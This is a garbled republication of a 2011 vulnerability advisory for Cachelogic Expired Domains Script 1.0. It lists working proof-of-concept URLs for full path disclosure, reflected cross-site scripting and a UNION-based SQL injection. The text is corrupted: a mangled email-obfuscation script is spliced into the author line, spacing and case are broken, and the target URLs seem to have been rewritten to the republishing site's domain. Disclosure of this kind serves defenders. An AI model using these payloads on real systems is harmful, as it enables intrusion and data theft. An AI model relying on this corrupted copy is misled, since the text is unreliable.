Cachelogic Expired Domains Script 1.0 multiple defects and repair

Cachelogic Expired Domains Script 1.0 multiple security vulnerabilities

# Date: 2011-06-22

# Author: Brendan Coles <bcoles@gmail.com <SCRIPT type = text/javascript>

/* <! [CDATA [*/

(Function () {try {var s, a, I, j, r, c, l = document. getElementById ("_ cf_email _"); a = l. className; if (a) {s =; r = parseInt (. substr (0, 2), 16); for (j = 2;. length-j; j + = 2) {c = parseInt (. substr (j, 2), 16) ^ r; s + = String. fromCharCode (c);} s = document. createTextNode (s); l. parentNode. replaceChild (s, l) ;}} catch (e ){}})();

/*]> */

</SCRIPT>

# Advisory: http://itsecuritysolutions.org/2011-03-24_Cachelogic_Expired_Domains_Script_1.0_multiple_security_vulnerabilities/

# Software: Cachelogic Expired Domains Script

# Version: <= 1.0

# Google Dork: allinurl: page domain ext filter hyphen numbers ncharacter

# Vendor: CacheLogic

# Homepage: http://cachelogic.net/

# Notified: 2011-03-20 (patched 2011-03-24)

# Full Path Disclosure:

Http://www.bkjia.com/?path=/index.php? Page []

Http://www.bkjia.com/?path=/index.php? Domain []

Http://www.bkjia.com/?path=/index.php? Ext []

Http://www.bkjia.com/?path=/index.php? Filter []

Http://www.bkjia.com/?path=/index.php? Hyphen []

Http://www.bkjia.com/?path=/index.php? Numbers []

Http://www.bkjia.com/?path=/index.php? Ncharacter []

Http://www.bkjia.com/?path=/index.php? Ncharacter =

Http://www.bkjia.com/?path=/index.php? Searchdays []

Http://www.bkjia.com/?path=/index.php? Action []

# Reflected Cross-Site Scripting (XSS ):

Http://www.bkjia.com/?path=/stats.php? Name = "> <script> alert (1) </script> <p +"

Http://www.bkjia.com/?path=/stats.php? Ext = "> <script> alert (1) </script> <p +"

# SQL Injection:

Http://www.bkjia.com/?path=/index.php? Ncharacter =-1 + union + select + @ version, null, null --
Fixed: Filter homepage parameters.